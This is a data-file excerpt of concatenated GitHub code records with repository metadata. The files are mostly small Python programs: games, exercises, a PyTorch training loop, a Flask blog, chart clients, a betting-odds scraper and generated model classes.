get_sms_credentials()\n client = Client(credentials['ACCOUNT_SID'], credentials['AUTH_TOKEN'])\n from_phone_number = credentials['FROM_PHONE_NUMBER']\n to_phone_number = credentials['TO_PHONE_NUMBER']\n sms_message = send_sms_message(client, from_phone_number, to_phone_number, message)\n status = confirm_sms_delivery(client, sms_message)\n\n message_short_ver = message[:30] + '...'\n if status == 'delivered':\n LOGGER.info('Successfully sent message: \"%s\"',\n message_short_ver)\n else:\n LOGGER.warning('Issue sending message: \"%s\". Message status: %s',\n message_short_ver, status)\n except Exception as e:\n print('Error sending message: %s' % e)\n LOGGER.warning('Error sending message: %s', e)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"cmdrchris/python_learning","sub_path":"text_myself.py","file_name":"text_myself.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25878583607","text":"import random\r\n\r\n\r\nclass coin:\r\n def __init__(self, heads, tails):\r\n self.heads = heads\r\n self.tails = tails\r\n\r\n\r\ncoin1 = coin(\"Heads\", \"Tails\")\r\n\r\nflip = True\r\nflipCounter = 0\r\n\r\n\r\n# headsCounter = 0\r\n# tailsCounter = 0\r\n\r\ndef rollDice():\r\n side = random.randint(1, 2)\r\n\r\n if side == 1:\r\n print(\"You got\", coin1.heads)\r\n # headsCounter=headsCounter+1\r\n else:\r\n print(\"You got\", coin1.tails)\r\n # tailsCounter=tailsCounter+1\r\n\r\n\r\ndef stop():\r\n print(\"You flipped\", flipCounter, \"coins.\")\r\n # print(\"You got\",headsCounter,\"heads and\",tailsCounter,\"tails.\")\r\n\r\n\r\nwhile flip:\r\n choice = raw_input(\"Press ENTER to flip a coin, or press q to exit: \")\r\n print(\"\")\r\n\r\n if choice == \"q\":\r\n stop()\r\n flip = False\r\n\r\n else:\r\n rollDice()\r\n flipCounter = flipCounter + 1\r\n\r\n","repo_name":"lucashernandezv/experiment","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70084800748","text":"import re\r\n\r\nh, w = map(int,input().split())\r\ns = []\r\nans = 0\r\n\r\nfor c1 in range(h):\r\n box = ( input() )\r\n tmp = []\r\n for c2 in range( len(box) ):\r\n if box[c2] == \"#\":\r\n tmp.append(int(1))\r\n else :\r\n tmp.append(int(0))\r\n s.append(tmp)\r\n\r\nfor c1 in range(h):\r\n for c2 in range(w):\r\n if s[c1][c2] == 1:\r\n for c3 in range(w):\r\n if (s[c1][c3] == 0):\r\n s[c1][c3] = 2\r\n for c3 in range(h):\r\n if (s[c3][c2] == 0):\r\n s[c3][c2] = 2\r\n \r\n\r\nfor c1 in range(h):\r\n ans = ans + sum([i > 0 for i in s[c1]])\r\nprint(ans)","repo_name":"0-ayano/Study-CP","sub_path":"B096_爆���の大爆発.py","file_name":"B096_爆弾の大爆発.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39334746465","text":"import torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader\n\nimport sys\nsys.path.append('..')\n\nfrom dataset.ImageDataset import ImageDataset\nfrom models.model import torch_model\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nBATCH_SIZE = 16\nFEATURE_SIZE = 10\nDATA_SIZE = 1500\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\ndef train_loop():\n dataset = ImageDataset('/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/circle_label.json',\\\n '/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/rectangle_label.json',\\\n '/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/triangle_label.json')\n dataloader = DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=16)\n poe_model = torch_model(DATA_SIZE+FEATURE_SIZE, device).to(device)\n optimizer = Adam(poe_model.parameters(), lr=1e-3)\n all_color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\n running_loss = last_loss = 0\n with open('log_image_train.txt', 'w')as f:\n f.write('Begin Training.\\n')\n \n for epoch in range(50):\n for i, image_dict in enumerate(dataloader):\n t1x = torch.tensor(image_dict['index']).to(device)\n color_idx = torch.tensor(image_dict['color']).to(device)\n shape_idx = torch.tensor(image_dict['shape'] + len(all_color)).to(device)\n pos_prob_color, _ = poe_model.forward((t1x, color_idx))\n pos_prob_shape, _ = poe_model.forward((t1x, shape_idx))\n \n loss = (torch.sum(pos_prob_color) + torch.sum(pos_prob_shape)) / BATCH_SIZE\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n if i % 50 == 49:\n last_loss = running_loss / 100\n print(f\"epoch {epoch} batch {i} Loss {last_loss}\")\n with open(\"log_image_train.txt\", \"a\") as f:\n f.write(f\"epoch {epoch} batch {i} Loss {last_loss}\\n\")\n running_loss = 0\n pass\n \n torch.save(poe_model.state_dict(), 'image_ckpt.pth.tar')\n \nif __name__ == \"__main__\":\n train_loop()\n \n ","repo_name":"GasaiYU/BoxEmbedding-Application","sub_path":"POE/experiment/train_img.py","file_name":"train_img.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40501437125","text":"# encoding: utf8\n\n# Import local files:\nimport colors as COLORS\nimport def_oars as DEF\nimport margins as MARGINS\nimport roi as ROI\nimport rois as ROIS\n\n# Definitions script for bladder treatments.\nclass DefBladder(object):\n\n # Adds target and OAR ROIs to the given site and creates them in RayStation.\n def __init__(self, pm, examination, ss, choices, site):\n # Choice 1: Intent\n intent = choices[1]\n if intent == 'palliative':\n # Targets:\n ctv = ROI.ROIAlgebra(ROIS.ctv.name, ROIS.ctv.type, COLORS.ctv_low, sourcesA=[ROIS.gtv_p], sourcesB=[ROIS.bladder], marginsA = MARGINS.uniform_5mm_expansion, marginsB = MARGINS.zero)\n ptv = ROI.ROIAlgebra(ROIS.ptv.name, ROIS.ptv.type, ROIS.ptv.color, sourcesA = [ctv], sourcesB = [ROIS.external], operator = 'Intersection', marginsA = MARGINS.bladder_expansion, marginsB = MARGINS.uniform_5mm_contraction)\n site.add_targets([ROIS.gtv_p, ctv, ptv])\n else:\n # Curative:\n # Targets:\n ctv_p = ROI.ROIExpanded(ROIS.ctv_p.name, ROIS.ctv_p.type, COLORS.ctv, source = ROIS.gtv_p, margins = MARGINS.uniform_5mm_expansion)\n ctv_e = ROI.ROIExpanded(ROIS.ctv_e.name, ROIS.ctv_e.type, COLORS.ctv, source = ROIS.bladder, margins = MARGINS.zero)\n ctv = ROI.ROIAlgebra(ROIS.ctv.name, ROIS.ctv.type, COLORS.ctv, sourcesA=[ctv_p], sourcesB=[ctv_e], marginsA = MARGINS.zero, marginsB = MARGINS.zero)\n ptv = ROI.ROIAlgebra(ROIS.ptv.name, ROIS.ptv.type, ROIS.ptv.color, sourcesA = [ctv], sourcesB = [ROIS.external], operator = 'Intersection', marginsA = MARGINS.bladder_expansion, marginsB = MARGINS.uniform_5mm_contraction)\n site.add_targets([ROIS.gtv_p, ctv_p, ctv_e, ctv, ptv])\n # DL OARs:\n examination.RunOarSegmentation(ModelName=\"RSL Male Pelvic CT\", ExaminationsAndRegistrations={ examination.Name: None }, RoisToInclude=[\"Bladder\", \"FemoralHead_L\", \"FemoralHead_R\", \"Rectum\"])\n # Non-DL OARs:\n site.add_oars([ROIS.bowel_space])\n # Create all targets and OARs in RayStation:\n site.create_rois()\n","repo_name":"Code-Quark/raystation-scripts","sub_path":"def_regions/def_bladder.py","file_name":"def_bladder.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72740674986","text":"\"\"\"\nlinklist.py\n功能:实现单链表的构建和功能操作\n重点代码\n\"\"\"\n\n#创建节点类\nclass Node:\n \"\"\"\n 思路:将自定义的类视为节点的生成类,实力对象中包含数据部分和指向下一个节点的next\n\n \"\"\"\n def __init__(self, value, next=None):\n self.value = value # 有用数据\n self.next = next # 循环下一个节点关系\n\n# node1 = Node(1)\n# node2 = Node(node1)\n# node3 = Node(node2)\n#\n\nclass LinkList:\n \"\"\"\n 思路:单链表类,生成对象可以进行増删改查\n \"\"\"\n def __init__(self):\n self.head=Node(None)\n\n\n# l=LinkList()\n# node=Node(1)\n# l.head.next=node\n#\n# print(l.head.next.value)\n def init_list(self,list_):\n p= self.head\n for item in list_:\n p.next=Node(item)\n p=p.next\n def show(self):\n p=self.head.next\n while p is not Node:\n print(p.value)\n p=p.next\n\nl=LinkList()\nl.init_list([1,2,3,4,5])\nl.show()\n\n\n\n\n\n\n","repo_name":"KaiyAngo/kaiyang","sub_path":"linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42092437622","text":"n = int(input())\nmove_type = list(map(str, input().split()))\n\nx, y = 1, 1 # 현재 위치\ndirection = ['L','R','U','D']\ndx = [0, 0, -1, 1] # L, R, U, D에 따른 이동 방향\ndy = [-1, 1, 0, 0]\n\nfor move in move_type: # 이동 계획을 하나씩 확인\n for i in range(len(direction)):\n if move == direction[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n\n if nx >= 1 and nx <= n and ny >= 1 and ny <= n: # 공간을 벗어나지 않는다면\n x = nx\n y = ny\n\nprint(x, y)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"이것이 코딩테스트다/구현/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"si","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23541718736","text":" # 랜덤 함수\n\n# 1. Clear 0000\n# 1 ~ 20 사이의 양의 정수중 \n# 난수 값 20 개 생성 후\n# List에 저장 \n#----------------------------------------------------------------\n# 2.\n# List 내 원소 값에 대한 \n# 합계, 평균, 최대 값, 최소 값 출력 \n#----------------------------------------------------------------\n# 3. \n# List 내 중복 값과 중복 횟수 정보 출력\n\n# 4. \n# 구간 별 히스토그램 정보 출력\n\n\n# < 1번 >\n\n# random 함수를 쓰기위해 import 선언! \nimport random\n# List 공간 만들기\nMyList = [ ]\n# 1-1. 1~20 사이를 만들 반복문(for) 작성\nfor Value in range (20) :\n# 1-2. 난수 값 무작위로 20개 생성\n ransuu=int(random.random() * 20) +1 \n# 1-3.List 공간 만들기 \n MyList.append(ransuu) # ex) MyList = [16, 15, 9, 9, 9,..... ]\n\n# 출력문 :랜덤 값 \nprint(\"랜덤 값 : \")\n# 반복해서 랜덤 값을 뽑을 \nfor RandomValue in range(len(MyList)) :\n result = MyList[RandomValue]\n print(\"\\t \",result, \" \", end=\"\")\n if RandomValue == len(MyList)//2-1 :\n print ()\n\n#----------------------------------------------------------------\n\n#2 번 으로 가기전에 띄워 쓰기 \nprint()\n# < 2번 >\n\n# 반복 적으로 list 안에 있는 값들을 추출\n# 最小 값 \nMax = MyList[RandomValue-1]\n# 最大 값 \nMin = MyList[RandomValue-1]\n# 합계 담을 변수 공간 \nSum = 0\nfor RandomValue in range(len(MyList)) :\n atai = MyList[RandomValue]\n Sum += atai\n # 最小\n if Min < MyList[RandomValue] :\n Min = Min\n else :\n Min = MyList[RandomValue]\n\n # 最大\n if Max >= MyList[RandomValue] :\n Max = Max \n else :\n Max = MyList[RandomValue]\n# for Value in MyList : \n \n# 2-1. 최소 값\nprint(\"최소 값\\t:\",Min)\n# 2-2. 최대 값\nprint(\"최대 값\\t:\",Max)\n# 2-3. 합계\nprint(\"합계\\t:\",Sum)\n# 2-4. 평균\nprint(\"평균\\t:\",Sum/len(MyList))\n\n#----------------------------------------------------------------\n\n# < 3번 >\n\n# 출력 단어 -> 중복 값 중복 회수\nprint(\"중복 값 중복 회수\")\n\n# 중복 횟수 측정 할 변수\ncount = 0\n# 1. 리스트의 안의 요소들과 비교할 1~20까지의 고정 숫자 뽑기\nfor duplicated in range(len(MyList)) : \n # 2. 1에서 뽑은 수로 리스트 안의 요소와 일치하는지 세기위한 반복문\n for element in MyList :\n # 조건식으로 비교 -> 고정값 , 요소값\n if duplicated == element :\n # 일치시 1씩 카운트 세기\n count += 1\n # 조건식 : 중복될 경우 해당 값과 중복 횟수 출력\n if count>= 2 : \n print(\" \",duplicated,\"\\t\",\" \",count)\n #첫번쨰 반복문이 다음으로 넘어갈시 카운트 초기화\n count = 0\n\n#----------------------------------------------------------------\n\n# < 4번 >\n# 구간별 히스토그램 문구 출력\nprint(\"구간별 히스토그램\")\n\n# 해당 범위에 들어오면 카운트할 변수 생성\ncount1 = 0\ncount2 = 0\ncount3 = 0\ncount4 = 0\n# 리스트 안의 원소를 하나씩 뽑을 반복문 작성 \n# 조건식 작성 : 히스토그램 범위 설정 \nfor index in MyList :\n # 1 ~ 5\n if 0 < index < 6:\n count1 += 1\n # 6 ~ 10\n elif 5< index < 11:\n count2 += 1\n # 11 ~ 15\n elif 10< index < 16:\n count3 += 1\n # 16 ~ 20\n else :\n count4 += 1\nprint (\"1 ~ 5 : \",\"*\"*count1)\nprint (\"6 ~ 10 : \",\"*\"*count2)\nprint (\"11 ~ 15 : \",\"*\"*count3)\nprint (\"16 ~ 20 : \",\"*\"*count4)","repo_name":"Jaeil-Lee/1_Grade","sub_path":"1_Semester/Python/1. Summer Vacation_1-1/07.07 목 - 랜덤함수/7.7 랜덤함수_과제.py","file_name":"7.7 랜덤함수_과제.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23200925399","text":"import csv\nimport asyncio\nimport nest_asyncio\nfrom pyppeteer import launch\n#from pyppeteer_stealth import stealth\n\nSELECTOR = '#root > div.css-ynz9y9 > div:nth-child(2) > div > div.css-1633bsf > div > div.css-1pcha61 > div > div.css-1633bsf > div > table > tbody>tr'\nOLD_ARRAY = []\nNEW_ARRY = []\n\nasync def launch_webpage():\n browser = await launch(headless=True, executablePath='/usr/bin/chromium-browser', args=['--no-sandbox'])\n page = await browser.newPage()\n try:\n await page.goto('https://play.pakakumi.com/')\n await page.waitForSelector(SELECTOR)\n tr_elements = await page.querySelectorAll(SELECTOR)\n with open('output/pakakumi_odds.csv', 'a', newline='') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n OLD_ARRAY.extend(NEW_ARRY)\n NEW_ARRY.clear()\n for tr_element in tr_elements:\n text_content = await page.evaluate('(trElement) => trElement.textContent', tr_element)\n NEW_ARRY.append(text_content.replace('x___',''))\n set1 = set(NEW_ARRY)\n set2 = set(OLD_ARRAY)\n new_odds = list(set1.difference(set2))\n print(f'New odds {new_odds}')\n for odd in new_odds:\n csv_writer.writerow(odd)\n except:\n pass\n return browser\n\nasync def main(runs):\n \n while runs > 0:\n print(f'{runs-1} Remaining...')\n try:\n browser = await launch_webpage()\n await asyncio.sleep(45)\n await browser.close()\n except:\n pass\n runs = runs-1\n \nnest_asyncio.apply()\nnew_loop = asyncio.new_event_loop()\nasyncio.get_event_loop_policy().set_event_loop(new_loop)\nnew_loop.run_until_complete(main(runs=10000))\n","repo_name":"samuelmunyoki/pakakumi_odds_scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27762718947","text":"\"\"\"\"\"\nDAY 1 - 02\n\n\nConsidering every single measurement isn't as useful as you expected: there's just too much noise in the data.\n\nInstead, consider sums of a three-measurement sliding window. Again considering the above example:\n\n199 A \n200 A B \n208 A B C \n210 B C D\n200 E C D\n207 E F D\n240 E F G \n269 F G H\n260 G H\n263 H\nStart by comparing the first and second three-measurement windows. The measurements in the first window are marked A (199, 200, 208); their sum is 199 + 200 + 208 = 607. The second window is marked B (200, 208, 210); its sum is 618. The sum of measurements in the second window is larger than the sum of the first, so this first comparison increased.\n\nYour goal now is to count the number of times the sum of measurements in this sliding window increases from the previous sum. So, compare A with B, then compare B with C, then C with D, and so on. Stop when there aren't enough measurements left to create a new three-measurement sum.\n\nIn the above example, the sum of each three-measurement window is as follows:\n\nA: 607 (N/A - no previous sum)\nB: 618 (increased)\nC: 618 (no change)\nD: 617 (decreased)\nE: 647 (increased)\nF: 716 (increased)\nG: 769 (increased)\nH: 792 (increased)\nIn this example, there are 5 sums that are larger than the previous sum.\n\nConsider sums of a three-measurement sliding window. How many sums are larger than the previous sum?\n\"\"\"\"\"\n\ninput = open(\"d1-01_input.txt\", \"r\")\nlines = input.readlines()\n\nsumNumbers = []\nnumbers = []\nincreased = 0\ndecreased = 0\n\nfor line in lines:\n numbers.append(int(line))\n\n if len(numbers) < 3:\n continue\n\n newSum = numbers[0] + numbers[1] + numbers[2]\n sumNumbers.append(newSum)\n numbers.pop(0)\n\n if len(sumNumbers) < 2:\n print(f\"{int(line)} (N/A - no previous measurement)\")\n continue\n\n if sumNumbers[1] > sumNumbers[0]:\n increased += 1\n print(f\"{sumNumbers[1]} (increased)\")\n elif sumNumbers[1] < sumNumbers[0]:\n decreased += 1\n print(f\"{sumNumbers[1]} (decreased)\")\n else:\n print(f\"{sumNumbers[1]} (no change)\")\n sumNumbers.pop(0)\n \n\nprint(f\"Increased: {increased}\")\nprint(f\"Decreased: {decreased}\")\n","repo_name":"Neocky/advent-of-code","sub_path":"2021/Day 1/d1-02.py","file_name":"d1-02.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4802788852","text":"from Products.PythonScripts.standard import Object\nimport json\n\n# Get result lines\ntest_result_lines = context.objectValues(portal_type=\"Test Result Line\", sort_on='int_index')\n\n# Create a dict containing stats for each test\ntests = []\ncount = 0\nfor tl in test_result_lines:\n # Get and parse stdout to a dict\n stdout = tl.getProperty('stdout')\n if stdout:\n count = count + 1\n stdout_lines = filter(None, stdout.split('\\n'))\n current_stats = dict( [(l.split(\"=\")[0].replace(\" \", \"_\"), \\\n l.split(\"=\")[1].isdigit() and int(l.split(\"=\")[1]) or str(l.split(\"=\")[1])) \\\n for l in stdout_lines ])\n\n tests.append(current_stats)\n\ntest_suite = context.getPortalObject().test_suite_module.searchFolder(title=context.getTitle())[0]\n\nxs = map(int, test_suite.getGraphCoordinate())\n\n\nreturn json.dumps({\"test\": tests, \"xs\": xs})\n","repo_name":"yarec/erp5","sub_path":"bt5/erp5_test_result/SkinTemplateItem/portal_skins/erp5_test_result/TestResult_getJsonScalabilityStats.py","file_name":"TestResult_getJsonScalabilityStats.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42249541698","text":"'''\nWrite a program that picks a random integer from 1 to 100, and has players guess the number. The rules are:\nIf a player's guess is less than 1 or greater than 100, say \"OUT OF BOUNDS\"\nOn a player's first turn, if their guess is\nwithin 10 of the number, return \"WARM!\"\nfurther than 10 away from the number, return \"COLD!\"\nOn all subsequent turns, if a guess is\ncloser to the number than the previous guess return \"WARMER!\"\nfarther from the number than the previous guess, return \"COLDER!\"\nWhen the player's guess equals the number, tell them they've guessed correctly and how many guesses it took!\n'''\n\n\ndef guessing_game():\n \n import random\n \n print(\"WELCOME TO GUESS ME!\")\n print(\"I'm thinking of a number between 1 and 100\")\n print(\"If your guess is more than 10 away from my number, I'll tell you you're COLD\")\n print(\"If your guess is within 10 of my number, I'll tell you you're WARM\")\n print(\"If your guess is farther than your most recent guess, I'll say you're getting COLDER\")\n print(\"If your guess is closer than your most recent guess, I'll say you're getting WARMER\")\n print(\"LET'S PLAY!\")\n \n num=random.randint(1,100)\n guess_list=[] #Creating lists for storing guesses and differences (to identify how far is the guess from no.)\n differences=[]\n while True:\n \n try:\n guess=int(input('Enter your guess (only an integer) :'))\n except:\n print('Please enter a valid integer')\n continue\n else:\n diff=abs(num-guess)\n guess_list.append(guess)\n differences.append(diff)\n if guess in range(1,101):\n if len(guess_list)==1 and len(differences)==1: #Checking condition for first guess\n if guess in range(num-10,num+11):\n print('WARM')\n continue\n elif guess==num:\n print('BINGO! You have won. It took you just 1 chance to guess correctly.')\n break\n else:\n print('COLD')\n continue\n elif len(guess_list)>1 and len(differences)>1: #Checking condition for subsequent guesses\n if guess==num and differences[-1]==0:\n print('BINGO! You have won. It took you just %s chances to guess correctly.'%(len(guess_list)))\n break\n elif differences[-1]<=differences[-2]:\n print('WARMER')\n continue\n else:\n print('COLDER')\n continue\n \n else:\n print('OUT OF BOUNDS')\n continue\n break\n \nguessing_game()","repo_name":"idubey-code/Python","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6654853850","text":"from flask import Flask, render_template, request\nimport requests\nfrom datetime import datetime\nimport calendar\nfrom send_mail import SendMail\n\ncurrent_year = datetime.now().year\nall_objects = []\nall_date = []\nall_body = []\ntotal = len(all_objects)\nblog_url = \"https://api.npoint.io/4358ffbd346683abf0e4\"\nall_posts = requests.get(blog_url).json()\nfor post in all_posts:\n all_objects.append(post)\n day = post[\"date\"].split(\"-\")[0]\n month = calendar.month_name[int(post[\"date\"].split(\"-\")[1])]\n year = post[\"date\"].split(\"-\")[2]\n date = (day, month, year)\n all_date.append(date)\n sentences = [sentence.replace(\".\", \"\") for sentence in post[\"body\"].split(\". \")]\n all_body.append(sentences)\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\", posts=all_objects, date=all_date)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n email = request.form[\"email\"]\n phone = request.form[\"phone\"]\n message = request.form[\"message\"]\n send_email = SendMail(name, email, phone, message)\n send_email.send_email()\n return render_template(\"contact.html\", data=True)\n else:\n return render_template(\"contact.html\")\n\n\n@app.route(\"/post/\")\ndef to_post(num):\n return render_template(\"post.html\", posts=all_objects, num=num, date=all_date, bodies=all_body)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"hadi-learn/CoursePython100DaysOfCode","sub_path":"day-60-blog-capstone-part-2b-mail/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30471809782","text":"\"\"\"Initiate clients.\"\"\"\nimport chart_studio\n\nfrom config import (\n ALPHA_VANTAGE_API_KEY,\n ALPHA_VANTAGE_CHART_BASE_URL,\n ALPHA_VANTAGE_PRICE_BASE_URL,\n IEX_API_BASE_URL,\n IEX_API_TOKEN,\n PLOTLY_API_KEY,\n PLOTLY_USERNAME,\n)\n\nfrom .crypto import CryptoChartHandler\nfrom .stock import StockChartHandler\n\n# Plotly chart studio authentication\nchart_studio.tools.set_credentials_file(\n username=PLOTLY_USERNAME, api_key=PLOTLY_API_KEY\n)\n\n# Create clients\nstock_chart_handler = StockChartHandler(token=IEX_API_TOKEN, endpoint=IEX_API_BASE_URL)\n\ncrypto_chart_handler = CryptoChartHandler(\n token=ALPHA_VANTAGE_API_KEY,\n price_endpoint=ALPHA_VANTAGE_PRICE_BASE_URL,\n chart_endpoint=ALPHA_VANTAGE_CHART_BASE_URL,\n)\n","repo_name":"toddbirchard/shibabot","sub_path":"clients/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16121375422","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\nif __name__ == '__main__':\n resolution_x, resolution_y = 1600, 1000\n sd.resolution = (resolution_x, resolution_y)\n\n\ndef snow(start_x=0, end_x=300, ground=100, height=50, quantity=100):\n for _ in range(quantity):\n x = sd.random_number(start_x, end_x)\n y = sd.random_number(ground, ground + height)\n length = sd.random_number(3, 10)\n sd.snowflake(center=sd.get_point(x, y), length=length)\n\n\nif __name__ == '__main__':\n sd.start_drawing()\n snow()\n sd.finish_drawing()\n sd.pause()","repo_name":"konkere/python_base","sub_path":"lesson_005/village_morning_static/snow.py","file_name":"snow.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31125953154","text":"#Unittest\nimport unittest as ut\nfrom unittest.mock import MagicMock\n\n#Constants\nfrom common import ut_constants\n\n#Test utils\nfrom tests.support.utils import get_args\n\n#Path parsing\nfrom pathlib import Path\n\n#Input parameters\nfrom operation.input import InputParameters, TrainingParameters, ImageGenerationParameters, update_params\n\nmodel_name = 'model_name'\ndataset_location = Path()\n\nnum_classes = 5\n\nclass TestUpdateParams(ut.TestCase):\n def test_update_params(self):\n #Arrange\n args = get_args(model_name, dataset_location)\n image_generation_params = ImageGenerationParameters(args)\n additional_kwargs = dict(num_classes = num_classes)\n\n #Act\n update_params(image_generation_params, **additional_kwargs)\n\n #Assert\n self.assertEqual(num_classes, image_generation_params.num_classes)\n\nclass TestImageGenerationParameters(ut.TestCase):\n def test_init(self):\n with self.assertRaises(ValueError):\n #Arrange\n bad_dataset_location = dataset_location / 'non_existent_location'\n args = get_args(None, bad_dataset_location)\n\n #Act\n _ = ImageGenerationParameters(args)\n\n args = get_args(model_name, dataset_location)\n _ = ImageGenerationParameters(args)\n\nclass TestInputDataParameters(ut.TestCase):\n def test_init(self):\n with self.assertRaises(ValueError):\n args = get_args(None, None)\n _ = InputParameters(args)\n\n args = get_args(model_name, dataset_location)\n _ = InputParameters(args)\n\nclass TestTrainingParameters(ut.TestCase):\n def test_init(self):\n #Arrange\n args = get_args(None, None)\n \n #Act\n train_params = TrainingParameters(args)\n\n #Assert\n self.assertEqual(train_params.batch_id, args.batch_id)\n self.assertEqual(train_params.epoch_id, args.epoch_id)\n self.assertEqual(train_params.num_fit_images, args.num_fit_images)\n self.assertEqual(train_params.number_of_epochs, args.number_of_epochs)\n self.assertEqual(train_params.learning_rate, args.learning_rate)\n self.assertEqual(train_params.number_prediction_steps, args.number_prediction_steps)\n self.assertEqual(train_params.checkpoint_batch_interval, args.checkpoint_batch_interval)","repo_name":"NareshPS/humpback-whale","sub_path":"tests/input_test.py","file_name":"input_test.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28739562856","text":"stock = {\n \"banana\":6,\n \"apple\":0,\n \"orange\":32,\n \"pear\":15}\nprices = dict(banana=4, apple=2, orange=1.5, pear=3)\ndef compute_bill(food):\n total = 0\n for item in food:\n if stock[item] > 0:\n total += prices[item]\n stock[item] -= 1\n return total\nprint(compute_bill([\"banana\", \"orange\", \"apple\"]))","repo_name":"abdulmoiz5656/forum2","sub_path":"q3.py","file_name":"q3.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15796845658","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\nfrom .device_configuration import DeviceConfiguration\n\n@dataclass\nclass IosUpdateConfiguration(DeviceConfiguration):\n \"\"\"\n IOS Update Configuration, allows you to configure time window within week to install iOS updates\n \"\"\"\n # The OdataType property\n odata_type: Optional[str] = \"#microsoft.graph.iosUpdateConfiguration\"\n # Active Hours End (active hours mean the time window when updates install should not happen)\n active_hours_end: Optional[datetime.time] = None\n # Active Hours Start (active hours mean the time window when updates install should not happen)\n active_hours_start: Optional[datetime.time] = None\n # Days in week for which active hours are configured. This collection can contain a maximum of 7 elements.\n scheduled_install_days: Optional[List[DayOfWeek]] = None\n # UTC Time Offset indicated in minutes\n utc_time_offset_in_minutes: Optional[int] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> IosUpdateConfiguration:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: IosUpdateConfiguration\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return IosUpdateConfiguration()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"activeHoursEnd\": lambda n : setattr(self, 'active_hours_end', n.get_time_value()),\n \"activeHoursStart\": lambda n : setattr(self, 'active_hours_start', n.get_time_value()),\n \"scheduledInstallDays\": lambda n : setattr(self, 'scheduled_install_days', n.get_collection_of_enum_values(DayOfWeek)),\n \"utcTimeOffsetInMinutes\": lambda n : setattr(self, 'utc_time_offset_in_minutes', n.get_int_value()),\n 